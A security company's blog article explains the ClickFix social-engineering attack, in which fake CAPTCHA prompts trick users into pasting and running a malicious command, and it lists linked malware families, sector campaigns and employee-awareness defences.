Digital Risk: Enterprises Need More Than Cyber Insurance
Threatonomics

Understanding the ClickFix attack

by Emma McGowan , Senior Writer
Published

How three keystrokes can lead to malware infection

Imagine a cyberattack so simple yet so deceptive that all it takes is three keystrokes to compromise your system. This is the reality of the ClickFix attack, a threat that Resilience threat researchers have observed in the wild since 2024 and that seems to be ramping up in recent weeks. ClickFix cleverly manipulates users into executing malicious commands under the guise of a routine bot verification test. Originally used in targeted attacks, this technique has rapidly gained traction, posing a significant risk to a broader audience.

At first glance, ClickFix appears harmless—just another “Verify You Are a Human” CAPTCHA-like prompt. However, beneath this familiar facade lies a dangerous trick: users are guided through three seemingly benign keystrokes that ultimately lead to malware installation. 

This attack preys on human behavior, exploiting trust in common online interactions to deploy password-stealing malware (aka infostealers), remote access trojans (RATs), and other malicious payloads. With cybercriminals refining their tactics to maximize efficiency and deception, understanding the mechanics of ClickFix is critical to preventing its spread.

How the ClickFix attack works

ClickFix thrives on social engineering, manipulating users into unwittingly executing malicious commands. This attack preys on human tendencies to solve perceived problems quickly, especially when faced with urgent or authoritative prompts. Because ClickFix requires user interaction, it can often evade automated security solutions that rely on detecting self-executing malware. 

The attack typically begins with a deceptive pop-up on a compromised or malicious website. This pop-up mimics a standard bot verification message, often displaying an “I’m not a robot” checkbox. Upon interaction, users are prompted to complete three simple steps to confirm their identity.

The first step instructs users to press the Windows Key + R simultaneously. This shortcut opens the Run dialog box, a legitimate Windows feature that allows users to execute commands and programs quickly.

Next, users are told to press CTRL + V, which pastes preloaded malicious code from the website’s virtual clipboard into the Run prompt. This action happens silently, meaning users may not even realize they have copied a harmful command.

Finally, pressing Enter executes the pasted command, triggering a download and execution of malicious code via mshta.exe, a Windows utility designed to run Microsoft HTML application files. This step compromises the device, enabling malware installation.

What malware does ClickFix deliver?

ClickFix has been linked to several well-known malware families, including:

  • XWorm
  • Lumma stealer
  • VenomRAT
  • AsyncRAT
  • Danabot
  • NetSupport RAT

The specific payloads vary but commonly include PowerShell scripts, JavaScript, or portable executable (PE) files. These malware variants are often designed to steal financial credentials, log keystrokes, and grant remote attackers full control over an infected device.

Examples of ClickFix in the wild

ClickFix quickly expanded beyond its initial targeted attacks and now affects a range of industries and individuals. Cybercriminals use phishing emails, compromised websites, and social engineering tactics to deploy this attack across different sectors. While any internet user could potentially fall victim to ClickFix, specific industries have been disproportionately targeted due to their reliance on online communications and digital workflows.

Hospitality

A phishing campaign impersonating Booking.com has been leveraging ClickFix to target hospitality organizations. Fraudulent emails reference negative guest reviews, booking requests, or promotional opportunities to lure recipients into clicking malicious links. Microsoft tracks this campaign as Storm-1865, noting that it has been active since at least December 2024.

Healthcare

Cybersecurity firm Arctic Wolf has observed ClickFix attacks targeting healthcare professionals. One notable instance involved malicious code injected into the HEP2go physical therapy video site, redirecting users to ClickFix prompts.

Car dealerships

In March 2025, DarkReading reported on a ClickFix attack targeting car dealerships. More than 100 automotive industry websites were infected via the streaming service provider LES Automotive. It’s the second major attack on an auto industry third-party vendor in less than a year, following the CDK Global takedown last June.

General public

According to the U.S. Department of Health and Human Services, ClickFix has extensive reach and has appeared in many services used by the general public. Variants of this attack have been observed in:

  • Fake Google Chrome error pages
  • Pop-ups spoofing Facebook login pages
  • Impersonations of PDFSimpli and reCAPTCHA
  • Instances invoking PowerShell scripts from remote websites

How to protect yourself (and your organization) against ClickFix

Because ClickFix relies on social engineering, the best defense is employee education. Security training should always include guidance on how to recognize a phishing scheme, as well as regular phishing attempts by your IT team. With that in mind, here are some best practices to defend against phishing: 

  • Educate employees on how to recognize phishing scams.
  • Warn employees to be skeptical of unexpected pop-ups requesting key combinations.
  • Encourage checking the sender’s email address carefully before taking action.
  • Advise contacting service providers directly to verify suspicious messages.
  • Caution against responding to emails with urgent calls to action.
  • Instruct employees to hover over links to inspect the full URL before clicking.
  • Teach employees to look for typos and subtle misspellings in emails and URLs.

The ClickFix attack is a reminder that cyber threats continue to evolve, finding new ways to bypass traditional security measures. Even seemingly innocuous actions—like pressing a few keys—can lead to real consequences if people are tricked into running malicious code.

Vigilance and skepticism are critical defenses against these attacks. Organizations and individuals must educate themselves on emerging threats, implement strong security protocols, and stay ahead of cybercriminal tactics.

About the Author
Emma McGowan , Senior Writer

Emma McGowan is the Senior Writer for industry-leading cyber risk company Resilience. She has been a full-time writer and editor for over 10 years, focused on technology and women’s health. Tech-fluent and highly motivated, Emma brings holistic experience leading brands in the delivery of high-quality, high-impact, multimedia digital content supported by strategy, planning, and performance analysis.

You might also like

A decision scientist’s perspective on AI

As the Senior Director of Cyber Resilience at Resilience, I bring a somewhat unconventional perspective to the table. Unlike many in our industry who come from traditional cybersecurity or insurance backgrounds, my expertise lies in decision science. Throughout my career, I’ve been fascinated by one central question: How can we help people make good decisions […]

What enterprises over $10 billion need to know about managing cyber risk

The role of the Chief Information Security Officer has undergone a profound transformation from a purely technical role to a strategic business one in recent years. For CISOs operating in organizations with over $10 billion in revenue—a segment that Resilience has recently expanded its cyber risk solutions to serve—the shift comes with unique pressures and […]

How to create an effective Incident Response Plan

Cyberattacks are no longer a distant threat—they are a certainty. Whether it’s a ransomware attack, data breach, or insider threat, organizations must be prepared to respond quickly and effectively. Without a solid plan in place, even a minor security incident can spiral into a major crisis, leading to financial losses, reputational damage, and regulatory penalties. […]

How MFA can be hacked

Multi-factor authentication (MFA) represents a significant improvement over single-factor authentication, adding an extra layer of security that has become standard practice across industries. It’s become so popular that many organizations and individuals believe implementing MFA makes their accounts nearly impenetrable to attackers. After all, even if someone steals your password, they would still need access […]

What is the ROC?

The cybersecurity industry thrives on headlines. A major software vulnerability, a ransomware attack, or a widespread outage—each event sends ripples of concern through the digital ecosystem, often accompanied by a rush to assign blame and predict catastrophic consequences.  However, the reality of cyber risk is far more nuanced than these attention-grabbing headlines suggest. The key […]

Quantifying cyber risk for strategic business alignment

In Resilience’s recent webinar, “Quantifying Cyber Risk for Strategic Business Alignment,” (which I hosted along with my colleagues Eric Woelfel, Senior Cybersecurity Engineer, and Erica Leise, Senior Security Engineer) we wanted to tackle a common—and often limiting—mindset in cybersecurity. It’s a mindset I’ve seen again and again in my decade and half building machine learning […]